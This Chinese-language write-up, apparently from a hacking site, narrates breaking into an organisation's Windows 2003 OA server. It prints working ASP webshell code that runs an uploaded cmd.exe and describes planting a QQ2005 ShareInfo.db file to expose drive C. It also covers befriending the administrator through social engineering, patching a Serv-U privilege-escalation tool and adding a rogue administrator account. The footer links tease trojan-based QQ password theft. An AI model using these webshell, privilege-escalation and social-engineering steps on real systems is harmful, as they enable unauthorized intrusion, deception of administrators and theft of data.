用QQ文件共享漏洞彻底攻破Windows2003的坚固堡垒

服务器上运行的第三方软件历来就被攻击者们看作是入侵目标系统的捷径。现在,著名的腾讯QQ又被列入了这些捷径名单,好在QQ并不是服务器必备的软件之一,所以相信不会造成大范围的危机。文中遇到特殊情况虽然不多,但大家还是应该遵照“可能的就应该防范”的原则做出相应防御。

一、在Windows2003中得到的webshell

此次渗透的目标是一台OA办公系统服务器。其操作系统新近升级到了Windows2003,但OA仍存在asp文件上传漏洞,所以webshell的取得并没有任何悬念。

阻碍是在权限提升时遇到的---

登陆webshell后发现只能查看服务器的D盘,对C盘不能进行任何访问,webshell的提示是“没有权限”。这点早在意料之中,因为wenshell只有guests组权限,再加上win2003默认禁止了“Everyone"匿名用户及“Guest"组权限用户访问cmd.exe,还造成了不能通过webshell运行cmd.exe。

唯一值得庆幸的是利用Webshell 可以对D盘(存放有web虚拟目录)各个子目录进行读写。这里除了web虚拟目录还有一些数据备份文件和一个腾讯QQ安装目录Tencent。

二、破解Serv-u的终极防范

Windows2003的种种默认安全配置展示了它强大的一面,近一步提升现有权限似乎已不太可能,直到我试图从系统入手向这台服务器发出FTP链接请求并看到Serv-u的banner时才觉得又有了一线希望。

前面提到由于Windows2003对cmd.exe的权限限制,通过webshell方式不能运行cmd.exe,这样的论断在2004年6期的防线的《构建Windows2003堡垒主机》一文也曾提到,但实践表明这并不正确,通过webshell上传本地非2003系统中未受限制的cmd.exe文件到可执行目录,再通过wscript组件,同样能够通过webshell方式在Windows2003下获得相应权限的cmd.exe。结合nc.exe,甚至还能得到一个guest组权限的命令行下的shell。

为此,我对老兵的站长助手6.0做了一些改进,增加了如下代码,使其能够利用Wscript.shell组件运行本地上传的cmd.exe。

Function CmdShell()

If Request("SP")<>"" Then Session("ShellPath") = Request("SP")

ShellPath=Session("ShellPath")

if ShellPath="" Then ShellPath = "cmd.exe"

if Request("wscript")="yes" then

checked=" checked"

else

checked=""

end if

If Request("cmd")<>"" Then DefCmd = Request("cmd")

SI="<form method=’post’><input name=’cmd’ Style=’width:92%’ class=’cmd’ value=’"&DefCmd&"’><input type=’submit’ value=’运行’>"

SI=SI&"<textarea Style=’width:100%;height:500;’ class=’cmd’>"

If Request.Form("cmd")<>"" Then

if Request.Form("wscript")="yes" then

Set CM=CreateObject(ObT(1,0))

Set DD=CM.exec(ShellPath&" /c "&DefCmd)

aaa=DD.stdout.readall

SI=SI&aaa

else%>

<object runat=server id=ws scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>

<object runat=server id=ws scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>

<object runat=server id=fso scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>

<%szTempFile = server.mappath("cmd.txt")

Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)

Set fs = CreateObject("Scripting.FileSystemObject")

Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)

aaa=Server.HTMLEncode(oFilelcx.ReadAll)

oFilelcx.Close

Call fso.DeleteFile(szTempFile, True)

SI=SI&aaa

end if

End If

SI=SI&chr(13)&"</textarea>"

SI=SI&"SHELL路径:<input name=’SP’ value=’"&ShellPath&"’ Style=’width:70%’>  "

SI=SI&"<input type=’checkbox’ name=’wscript’ value=’yes’"&checked&">WScript.Shell</form>"

Response.Write SI

End Function

利用时只需在shell路径中指定上传的cmd.exe路径,再选中选项Wscript就能运行一些所需权限较低的系统命令,如“net start”或者“netstat -an”,依次运行这两个命令后Webshell回显了众多服务,包括Serv-U FTP Server, 活动端口列表中又出现了43958端口,于是我自然想到了神通广大的Serv-u ftp Server本地权限提升漏洞。可真正用到的ftp本地权限提升工具在执行系统命令时,却出现了530错误提示(如图1)。看来管理员或者其他人对Serv-u打上了布丁或者做了某些安全配置。为了知道究竟是怎样的安全配置,上网查了查相关文章,其中有一篇《Serv-u ftp Server 本地权限提升漏洞的终极防范》很受欢迎,被多方转载,作者是世外高人xiaolu。从错误提示看很有可能做了该文所谓的终极防范,即对ServUDaemon.exe中默认的管理员或密码进行了修改。当然这只是假设,只有将目标服务器上的ServUDaemon.exe下载下来看看具体配置才能确定,但是安装有Serv-u的C盘禁止访问,包括Programe files 目录,权限提升再次受阻。

三、利用QQ2005共享文件漏洞将权限提升到底

再次翻了翻D盘,又见到了那个很少能在服务器中看到的Tencent文件夹。查看whatsnew.txt。

得知QQ的版本是QQ2005 Beta1,几个于相关文件的创建时间也说明网管最近在服务器上登陆过QQ。难道只能用QQ?经过一番思索,终于想到一个可以利用的QQ2005在文件共享功能上的一则漏洞。

该漏洞是随着QQ2005贺岁版新增功能出现的。可以将其危害描述为:利用该漏洞,攻击者可以浏览,读取用户系统中的任意文件(如sam文件、数据备份文件、敏感信息文件)。影响系统:安装有QQ2005贺岁版以上的所有Windows系列操作系统。

具体利用方法是:先在本机登陆自己的QQ,调出“QQ菜单”,选择工具->设置共享,指定C:\或者其他任何有利用价值的分区为共享文件,完成后关闭QQ,找到安装目录下的以QQ帐号命名的文件夹内“ShareInfo.db”文件。如图3所示。,上传覆盖目标服务器上相同文件(如:D:\Tencent\QQ\654321\ShareInfo.db)。这样,当网管在服务器上登陆QQ时就会向好友开放C盘为共享目录。。

因为陌生人是不能共享对方文件,所以还需要用社会工程学申请将管理员加为好友(理由当然越可信越好)。如果管理员通过请求,服务器的C盘会以QQ共享文件目录的名义被共享,原本不能通过WEBSHELL访问的ServUDaemon.exe文件就能被下载,遇到阻碍的权限提升之路又能继续了。

当晚管理员就通过了申请,将我添加为好友。珊瑚虫QQ上显示的IP正是目标服务器的IP,于是下载了ServUDaemon.exe文件,用UE打开后查找127.0.0.1,发现默认配置下的内置帐户“LocalAdministrator”果然被改成了“LocalAdministruser”。这看起来是一个很“终极”的防御,但提出该方法的xiaolu似乎没有进行攻防所须的换位思考就将其公布,要知道攻击者只需知道修改后的配置,并对本地权限提升利用工具进行相应的修改,所谓的终极防御也就被攻破了。方法还是用UE打开脱了壳的serv-u本地权限提升利用工具,将LocalAdministrator改为LocalAdministruser即可。

然后上传修改后的ftp2.exe,在wscript.shell中执行D:\web\ftp2.exe “net user user password /add”后看看结果,已经成功添加了一个用户。再把该用户加入administrators组和“Remote desktop users”组后登陆了目标服务器的远程桌面。

―――经过重重险阻,终于彻底攻陷了这台坚固的Windows2003堡垒。

四、简单启示

可以看出,和“服务越少越安全”一样,服务器上运行的“第三方”越少越安全,流行的PcAnywhere、VNC、Serv-U 权限提升和这里提出的利用QQ2005提升权限,都是可以这样避免

(0)

相关推荐

  • 用QQ文件共享漏洞彻底攻破Windows2003的坚固堡垒

    服务器上运行的第三方软件历来就被攻击者们看作是入侵目标系统的捷径.现在,著名的腾讯QQ又被列入了这些捷径名单,好在QQ并不是服务器必备的软件之一,所以相信不会造成大范围的危机.文中遇到特殊情况虽然不多,但大家还是应该遵照"可能的就应该防范"的原则做出相应防御. 一.在Windows2003中得到的webshell 此次渗透的目标是一台OA办公系统服务器.其操作系统新近升级到了Windows2003,但OA仍存在asp文件上传漏洞,所以webshell的取得并没有任何悬念. 阻碍是在权限

  • 惊!QQ新漏洞 腾讯3亿用户遭受威胁 附说明

    根据易观国际发布<2007年第2季度中国即时通讯市场季度监测>报告显示,中国活跃的IM软件账号已经 达到了3.76亿个,其中拥有2.9亿活跃用户账号的腾讯QQ是当之无愧的IM王者.可是你知道吗,你的QQ现在很危险了! 不需要什么高超的技巧,黑客就可以轻松地盗取你的QQ.想知道他们是怎么做的以及该如何避免自己的QQ 被盗吗?快随小编一起看看QQ场景漏洞的破解之法(属于0DAY漏洞). 月黑风高夜,黑客挖出了一个宝箱,里面盛放着光彩夺目的"QQ场景漏洞".他们惊奇的发现,不需要

  • PHP采用curl模仿用户登陆新浪微博发微博的方法

    本文实例讲述了PHP采用curl模仿用户登陆新浪微博发微博的方法.分享给大家供大家参考.具体实现方法如下: 现在用php做模仿用户登录我们都会使用到PHP curl函数了,因为只有它才可以实现像用户一样的去访问别人网站了,下面就给大家介绍一下curl登陆新浪微博发微博应用例子. 前天接到一个需求需要模拟登陆微博然后进行发微博,以前干过很多的模拟登录阿里妈妈,微信,还有些其他的内部系统,至今没有出现不能登录的,哈哈,所以也就没有当一回事情,可是当分析新浪的登陆过程的时候才感觉到压力 遇到sha1(

  • 如何防范别人盗你的qq号(盗别人的qq密码)

    请看-- 1.前提工作,你要去下载木马"冰河",和"NetxRAY",还有 "ExeBind".冰河是一个远程监控软件,是BO一类的东西,只要对方运行了服务端程序,他的系统就随时向你敞开!现在比较流行的是灰鸽子远程控制 ,NetxRAY 是可以用来看对方的IP的:Exebind ,可以把两个exe文件合并成一个exe文件,运行时,分别执行.使用方法?我不教,自己研究.然后,使用exebind把冰河的服务端程序和一个正常的程序合并到一起.例如:取名

  • Windows Vista下去除QQ和MSN广告的方法

    QQt MSN上的广告让我们感受很不舒服,那有什么方法可以去除他们呢?下面请我们为大家介绍的Windows Vista操作系统中如何去除QQ和MSN广告方法. 去除QQ广告 腾讯QQ的登录窗口和QQ聊天窗口的广告,出了名的多,更新还很频繁.很多网友都去下载XXX版的QQ,可是,却不小心中了病毒木马,或者是被安装进了流氓软件和插件,万事都靠自己,如何不用任何工具就彻底屏蔽QQ广告呢?Vista之家团队已经测试了屏蔽QQ广告的办法,适合于腾讯qq各个版本! 首先,找到腾讯QQ的安装目录,里面有个子文

  • QQ密码找回方法全攻略(QQ被盗怎么要回QQ密码呢)

    目前QQ木马品种繁多,功能强大,且易学易用,连初学者也会用!正因为这样,QQ木马才那么容易泛滥成灾,现在的网吧,学校机房--30%都可能被人装上了木马,况且大家的防盗意识不高,QQ被盗已是常见事.当QQ被盗了,怎么才可以要回呢?!这是我在网上回答网友N遍的问题了,现在总结一下供大家参考: 要想要回QQ有必要了解下QQ是怎么被盗的,"小黑客们" 常用以下几种盗取QQ: (1)装木马程序.QQ被盗95%都是中了别人装的木马程序.什么叫木马程序你也不必要理解,就当作是你上QQ时有个东西记录了

  • 伯乐asp收信程序漏洞及利用程序利用代码

    http://forum.eviloctal.com/thread-32151-1-1.html  之后又有会员PM我..加上事过已久..也不是什么保密的东西了..网上也许到处都是了..就考虑把东西发出来..算是个学习吧..  伯乐的收信程序(针对以前的老版本.后来修补了这个漏洞)  主数据库名第一次使用设置时是随机产生的..但因为他是通用收信程序..可以截获密保..  mibao.asp文件对提交的参数没有任何过滤  复制代码 代码如下: if action="put" then  

  • 小议yxbbs漏洞利用代码

    1.任意文件下载漏洞. 漏洞文件: ViewFile.asp Function ChkFile(FileName)  Dim Temp,FileType,F  ChkFile=false  FileType=Lcase(Split(FileName,".")(ubound(Split(FileName,"."))))  Temp="|asp|aspx|cgi|php|cdx|cer|asa|"  If Instr(Temp,"|&quo

  • Win2008 蓝屏漏洞揭秘

    9月初,在各大安全网站上登载了一个Windows操作系统的蓝屏漏洞的消息,这个漏洞的出现如同一颗石子,打破了近半年来Windows没有爆出重大漏洞的沉寂. 蓝屏漏洞威胁的是服务器操作系统Windows Server 2008,这意味着如果Windows Server 2008蓝屏,将导致服务器停止服务--目前,漏洞的利用代码还限制在小范围内,不过漏洞攻击工具却已经研制出来了,现在为大家揭秘蓝屏漏洞的利用过程. 问题: Windows Server 2008蓝屏漏洞 危害: 服务器出现蓝屏停止服务

  • 常用网页编辑器漏洞手册(全面版)fckeditor,ewebeditor

    FCKeditor FCKeditor编辑器页/查看编辑器版本/查看文件上传路径 FCKeditor编辑器页 FCKeditor/_samples/default.html 查看编辑器版本 FCKeditor/_whatsnew.html 查看文件上传路径 fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&Curren

随机推荐